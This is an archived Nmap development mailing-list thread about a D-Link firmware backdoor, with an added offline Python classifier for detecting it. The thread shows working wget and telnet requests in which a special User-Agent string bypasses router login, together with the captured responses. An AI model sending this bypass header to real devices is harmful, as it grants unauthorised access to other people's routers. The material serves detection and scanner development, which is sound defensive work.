Nmap Development mailing list archives

Re: D-Link firmware backdoor


From: David Maynor <dave () erratasec com>
Date: Wed, 16 Oct 2013 12:54:05 +0000

These are done against the same IP, only difference is the user agent:
Davids-Mac-mini:dlink_scan dave$ wget -S --user-agent="xmlset_roodkcableoj28840ybtide" http://xxx.xxx.xxx.xxx
--2013-10-15 16:59:43--  http://xxx.xxx.xxx.xxx/
Connecting to xxx.xxx.xxx.xxx:80... connected.
HTTP request sent, awaiting response... 
 HTTP/1.0 200 OK
 Server: Alpha_webserv
 Date: Tue, 15 Oct 2013 20:59:44 GMT
 Content-Type: text/html
 Accept-Ranges: bytes
 Connection: close
 X-Pad: avoid browser bug
Length: unspecified [text/html]
Saving to: ‘index.html’

   [ <=>                                      ] 1,445       --.-K/s   in 0.009s  

2013-10-15 16:59:44 (149 KB/s) - ‘index.html’ saved [1445]

Davids-Mac-mini:dlink_scan dave$ wget -S http://xxx.xxx.xxx.xxx
--2013-10-15 17:00:09--  http://xxx.xxx.xxx.xxx/
Connecting to xxx.xxx.xxx.xxx:80... connected.
HTTP request sent, awaiting response... 
 HTTP/1.1 401 Unauthorized
 Server: thttpd-alphanetworks/2.23
 Content-Type: text/html
 Date: Tue, 15 Oct 2013 21:00:10 GMT
 Last-Modified: Tue, 15 Oct 2013 21:00:10 GMT
 Accept-Ranges: bytes
 Connection: close
 WWW-Authenticate: Basic realm="BRL-04R"
Authorization failed.
Davids-Mac-mini:dlink_scan dave$

The server field gets set depending on your auth status. No auth gets you thttpd-alphanetworks/2.23 and auth gets
Alpha_webserv

On Oct 16, 2013, at 7:49 AM, Michael Meyer <michael.meyer () greenbone net> wrote:

*** Patrik Karlsson wrote:

Please find a script attached to detect the D-Link firmware bypass outlined
in this article:
http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/

It's been a while since I committed something, so I will wait for some
feedback before I do.

Just a note about...

and server:match("^thttpd%-alphanetworks"))

On some affected devices the server header is 'Server: Alpha_webserv'
instead of 'Server: thttpd-alphanetworks/'...

if ( response.status == 200 )

...and there are also some devices which do not send a header
at all when this fake user-agent is set. On such devices you
could check for the existence of 'self.location.href' after
successfully bypassing the login.

mime@kira[6]:~ (1)$ telnet 192.168.44.8 8080
Trying 192.168.44.8...
Connected to 192.168.44.8.
Escape character is '^]'.
GET / HTTP/1.0

HTTP/1.0 401 Unauthorized
Server: thttpd-alphanetworks/2.23
Content-Type: text/html
Date: Tue, 15 Oct 2013 11:51:23 GMT
Last-Modified: Tue, 15 Oct 2013 11:51:23 GMT
Accept-Ranges: bytes
Connection: close
WWW-Authenticate: Basic realm="BRL-04UR"

<HTML><HEAD><TITLE>401 Unauthorized</TITLE>
[...]

mime@kira[6]:~ (1)$ telnet 192.168.44.8 8080
Trying 192.168.44.8...
Connected to 192.168.44.8.
Escape character is '^]'.
GET / HTTP/1.0
User-Agent: xmlset_roodkcableoj28840ybtide

<HTML>
<HEAD>
<TITLE>BRL-04UR</TITLE>
[...]
  self.location.href="index1.htm";
[...]

Micha

-- 
Michael Meyer                            OpenPGP Key: 52A6EFA6
http://www.greenbone.net/
Greenbone Networks GmbH, Neuer Graben 17, 49074 Osnabrück | AG
Osnabrück, HR B 202460
Geschäftsführer: Lukas Grunwald, Dr. Jan-Oliver Wagner
_______________________________________________
Sent through the dev mailing list
http://nmap.org/mailman/listinfo/dev
Archived at http://seclists.org/nmap-dev/


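The thread describes three response shapes for the same device: a plain GET gets a 401 with the thttpd-alphanetworks banner, the tagged request gets a 200 with Alpha_webserv (or thttpd-alphanetworks), and on some devices the tagged request gets a bare HTML body with no status line or headers, where only self.location.href gives it away. The following is an added example for this archive page, not Patrik's NSE script and not code from the Nmap project. It is an offline classifier: it parses two captured responses (baseline and tagged) and applies the checks Michael and David describe, so the detection logic can be tested against stored captures without touching a device. The sample responses are constructed, modelled on the ones quoted above; the label strings returned by classify_pair are my own.

```python
"""Offline classifier for the response pairs discussed in this thread.

Added example: not the NSE script from the list, sends no traffic. Given a
plain GET response and the response to the same GET with the special
User-Agent, it decides whether the pair shows the reported behaviour.
"""
from dataclasses import dataclass, field
from typing import Optional

# Server banners named in the thread (Alpha Networks firmware)
ALPHA_BANNERS = ("thttpd-alphanetworks", "Alpha_webserv")
# Body marker suggested for devices that answer with no headers at all
REDIRECT_MARKER = "self.location.href"


@dataclass
class HttpResponse:
    status: Optional[int]                 # None when no status line is present
    headers: dict = field(default_factory=dict)
    body: str = ""


def parse_response(raw: str) -> HttpResponse:
    """Parse a raw HTTP/1.x response; tolerate a bare HTML body with no headers."""
    text = raw.replace("\r\n", "\n").lstrip("\n")
    first_line = text.split("\n", 1)[0]
    if not first_line.startswith("HTTP/"):
        # Headerless case from the thread: the whole capture is body
        return HttpResponse(status=None, body=text)
    head, _, body = text.partition("\n\n")
    lines = head.split("\n")
    parts = lines[0].split(None, 2)
    status = int(parts[1]) if len(parts) > 1 and parts[1].isdigit() else None
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return HttpResponse(status, headers, body)


def is_alpha_banner(resp: HttpResponse) -> bool:
    """Server header matches either banner seen in the thread."""
    return resp.headers.get("server", "").startswith(ALPHA_BANNERS)


def looks_authenticated(resp: HttpResponse) -> bool:
    """True when the response hands out page content instead of a 401."""
    if resp.status == 200:
        return True
    # No status line at all: fall back to the redirect marker in the body
    return resp.status is None and REDIRECT_MARKER in resp.body


def classify_pair(baseline_raw: str, tagged_raw: str) -> str:
    """Compare the plain request's response with the tagged request's response.

    Labels (chosen for this example): 'backdoor-indicated', 'no-bypass',
    'not-alphanetworks', 'inconclusive'.
    """
    baseline = parse_response(baseline_raw)
    tagged = parse_response(tagged_raw)
    if baseline.status != 401:
        return "inconclusive"       # device did not demand auth in the first place
    # The banner may be on either response; the headerless reply carries none
    if not (is_alpha_banner(baseline) or is_alpha_banner(tagged)):
        return "not-alphanetworks"
    return "backdoor-indicated" if looks_authenticated(tagged) else "no-bypass"


# Constructed captures modelled on the responses quoted in the thread
BASELINE_401 = (
    "HTTP/1.1 401 Unauthorized\r\nServer: thttpd-alphanetworks/2.23\r\n"
    "Content-Type: text/html\r\nWWW-Authenticate: Basic realm=\"BRL-04R\"\r\n"
    "\r\nAuthorization failed.\r\n"
)
TAGGED_200 = (
    "HTTP/1.0 200 OK\r\nServer: Alpha_webserv\r\nContent-Type: text/html\r\n"
    "\r\n<HTML><HEAD><TITLE>BRL-04R</TITLE></HEAD></HTML>\r\n"
)
TAGGED_HEADERLESS = (
    "<HTML>\n<HEAD>\n<TITLE>BRL-04UR</TITLE>\n"
    "<script>self.location.href=\"index1.htm\";</script>\n"
)
OTHER_401 = "HTTP/1.1 401 Unauthorized\r\nServer: Apache\r\n\r\n"
OTHER_200 = "HTTP/1.1 200 OK\r\nServer: Apache\r\n\r\n<html></html>\r\n"

if __name__ == "__main__":
    for name, pair in {
        "alpha 401 -> 200": (BASELINE_401, TAGGED_200),
        "alpha 401 -> headerless": (BASELINE_401, TAGGED_HEADERLESS),
        "alpha 401 -> 401": (BASELINE_401, BASELINE_401),
        "apache 401 -> 200": (OTHER_401, OTHER_200),
    }.items():
        print(f"{name}: {classify_pair(*pair)}")
```

Running it as a script prints one label per constructed pair; in practice the two captures would come from a proxy or pcap taken during an authorised scan, and the "no-bypass" result for an Alpha Networks banner is the baseline you want after a firmware update.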
